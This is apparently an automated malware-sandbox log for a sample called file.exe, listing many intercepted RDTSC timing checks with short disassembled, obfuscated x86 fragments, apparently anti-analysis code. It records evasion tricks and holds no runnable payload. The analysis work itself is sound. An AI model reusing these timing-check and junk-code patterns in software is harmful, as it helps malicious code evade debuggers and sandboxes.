Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4C9 second address: 5EC4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4CF second address: 5EC4D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4D3 second address: 5EC57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1EC2350Ah 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FCBA46BC738h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 cld 0x0000002a lea ebx, dword ptr [ebp+1244C2DBh] 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FCBA46BC738h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1A4Bh], edi 0x00000050 or dword ptr [ebp+122D1A4Bh], esi 0x00000056 mov ecx, dword ptr [ebp+122D3906h] 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e jmp 00007FCBA46BC745h 0x00000063 jbe 00007FCBA46BC74Ch 0x00000069 jmp 00007FCBA46BC746h 0x0000006e popad 0x0000006f push eax 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jg 00007FCBA46BC736h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5D7 second address: 5EC5DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5DC second address: 5EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnc 00007FCBA46BC739h 0x00000010 push 00000000h 0x00000012 jbe 00007FCBA46BC737h 0x00000018 call 00007FCBA46BC739h 0x0000001d jmp 00007FCBA46BC742h 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC619 second address: 5EC61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC61D second address: 5EC680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC745h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jo 00007FCBA46BC74Bh 0x00000015 jmp 00007FCBA46BC745h 0x0000001a push edi 0x0000001b js 00007FCBA46BC736h 0x00000021 pop edi 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 jo 00007FCBA46BC73Eh 0x0000002b jne 00007FCBA46BC738h 0x00000031 pushad 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c jg 00007FCBA46BC736h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7BA second address: 5EC806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FCBA4817E85h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FCBA4817E7Ah 0x00000016 jno 00007FCBA4817E7Ch 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007FCBA4817E80h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC806 second address: 5EC827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FCBA46BC738h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB13 second address: 60CB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E85h 0x00000009 pop ebx 0x0000000a ja 00007FCBA4817E7Ch 0x00000010 jl 00007FCBA4817E78h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB44 second address: 60CB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB4A second address: 60CB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jbe 00007FCBA4817E8Dh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AB0C second address: 60AB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC744h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 jns 00007FCBA46BC73Ah 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AC96 second address: 60ACA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FCBA4817E76h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ACA3 second address: 60ACA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ACA8 second address: 60ACAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE01 second address: 60AE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE09 second address: 60AE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE0F second address: 60AE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCBA46BC749h 0x0000000b ja 00007FCBA46BC736h 0x00000011 jmp 00007FCBA46BC741h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007FCBA46BC736h 0x0000001f jmp 00007FCBA46BC73Bh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE59 second address: 60AE80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c jp 00007FCBA4817E76h 0x00000012 pop edi 0x00000013 push ecx 0x00000014 jns 00007FCBA4817E76h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AFD7 second address: 60AFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60B142 second address: 60B15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60BBF7 second address: 60BBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602FBD second address: 602FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FCBA4817E82h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602FD5 second address: 602FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E20A5 second address: 5E20E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA4817E83h 0x00000011 popad 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FCBA4817E85h 0x0000001b pop edx 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C444 second address: 60C448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F216 second address: 60F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F21A second address: 60F220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612794 second address: 612798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612C7F second address: 612C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612DA9 second address: 612DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115A8 second address: 6115AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115AE second address: 6115B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612E98 second address: 612EBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCBA46BC738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBA46BC73Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612EBA second address: 612EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B50 second address: 616B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B58 second address: 616B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B5E second address: 616B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC746h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 pop edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B85 second address: 616B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616CE5 second address: 616CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E3B second address: 616E68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCBA4817E89h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jns 00007FCBA4817E76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E68 second address: 616E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616FDD second address: 616FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6175A1 second address: 6175AB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D08 second address: 618D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCBA4817E76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D13 second address: 618D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007FCBA46BC744h 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FCBA46BC736h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D2C second address: 618D42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 or di, B341h 0x0000000c push 94D92880h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619937 second address: 619976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov esi, dword ptr [ebp+122D1C78h] 0x00000010 nop 0x00000011 jmp 00007FCBA46BC740h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBA46BC741h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619976 second address: 619988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619988 second address: 61998E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619B64 second address: 619B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619DA8 second address: 619DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B322 second address: 61B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B969 second address: 61B97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C35B second address: 61C3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FCBA4817E88h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FCBA4817E78h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov esi, dword ptr [ebp+122D3922h] 0x00000032 push 00000000h 0x00000034 mov esi, 48731DDCh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C1FC second address: 61C202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3B5 second address: 61C3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C202 second address: 61C206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3D2 second address: 61C3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E450 second address: 61E455 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE4 second address: 61CBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE8 second address: 61CBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4A4D second address: 5D4A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EADB second address: 61EAE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EAE1 second address: 61EAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F588 second address: 61F5FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FCBA46BC738h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FCBA46BC745h 0x00000030 or dword ptr [ebp+122D2773h], esi 0x00000036 push 00000000h 0x00000038 jmp 00007FCBA46BC749h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F5FE second address: 61F617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FCBA4817E7Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621480 second address: 621510 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FCBA46BC740h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FCBA46BC738h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov esi, ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D27EBh], ecx 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D2BA9h], esi 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FCBA46BC744h 0x0000005e push eax 0x0000005f js 00007FCBA46BC74Fh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620712 second address: 620716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621D93 second address: 621D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62730A second address: 627310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627310 second address: 627380 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC73Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FCBA46BC738h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FCBA46BC738h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov ebx, 04D39903h 0x00000048 cmc 0x00000049 jne 00007FCBA46BC738h 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+1244DF87h], ebx 0x00000057 xchg eax, esi 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626364 second address: 626369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627380 second address: 62739F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626369 second address: 626389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jp 00007FCBA4817E7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628442 second address: 628447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628447 second address: 62845A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845A second address: 62845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845E second address: 628468 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A59E second address: 62A5AB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
